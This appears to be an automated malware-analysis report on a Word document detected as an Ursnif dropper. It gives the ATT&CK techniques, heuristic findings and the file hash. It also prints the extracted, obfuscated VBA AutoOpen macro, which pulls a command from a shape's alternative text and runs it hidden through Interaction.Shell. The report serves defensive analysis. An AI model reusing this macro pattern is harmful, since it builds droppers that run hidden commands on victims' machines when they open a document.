MALICIOUS (Risk Score: 142)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Ursnif-6864686-0', indicating it is likely part of the Ursnif family. The presence of an AutoOpen VBA macro, specifically the 'macros.bas' script, suggests an attempt to execute malicious code upon opening the document. The script uses 'Interaction.Shell' to run a command, likely to download and execute a second-stage payload, which is a common dropper behavior.
Heuristics 5
- ClamAV: Doc.Dropper.Ursnif-6864686-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1414 bytes |

SHA-256: b87169c34ec094d04406ad92ae4ed374ad713c2c8db663a65fef223e8607951f

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "chefowe"
Function jeXhqoI()
    Set jeXhqoI = ActiveDocument.Shapes(2)
    Dim FDGWC As Integer
    Dim rxanykir As Long
    FDGWC = 6972# - 4508#
    Dim jsRWEh As Variant
    jsRWEh = FDGWC - 2899#
End Function
Sub AutoOpen()
    Dim PFMlTrd As Integer
    Dim NWLOoAWp As Long
    PFMlTrd = 6104# - 1540#
    Dim KOLlajz As Variant
    KOLlajz = PFMlTrd - 8083#
    Dim ubnuxW As Integer
    Dim UdgvlwM As Long
    ubnuxW = 5311# - 9974#
    Dim RVgfDd As Variant
    RVgfDd = ubnuxW - 7654#
    Dim npuhypigif As Integer
    Dim fruna As Long
    npuhypigif = 1369# - 7219#
    Dim qcykavyza As Variant
    qcykavyza = npuhypigif - 2686#
    Set rvuwage = jeXhqoI
    IvqlPB = jeXhqoI.AlternativeText
    Dim jpyxo As Integer
    Dim Nzrnz As Long
    jpyxo = 6713# - 8222#
    Dim jNsepbzW As Variant
    jNsepbzW = jpyxo - 4069#
    Interaction.Shell@ _
    IvqlPB, vbHide
    Dim fzere As Integer
    Dim xvusiromi As Long
    fzere = 6854# - 2189#
    Dim cGgzlFg As Variant
    cGgzlFg = fzere - 7456#
    Dim ssuqajaf As Integer
    Dim zcEMGjY As Long
    ssuqajaf = 5938# - 7681#
    Dim vmyvog As Variant
    vmyvog = ssuqajaf - 7366#
End Sub
```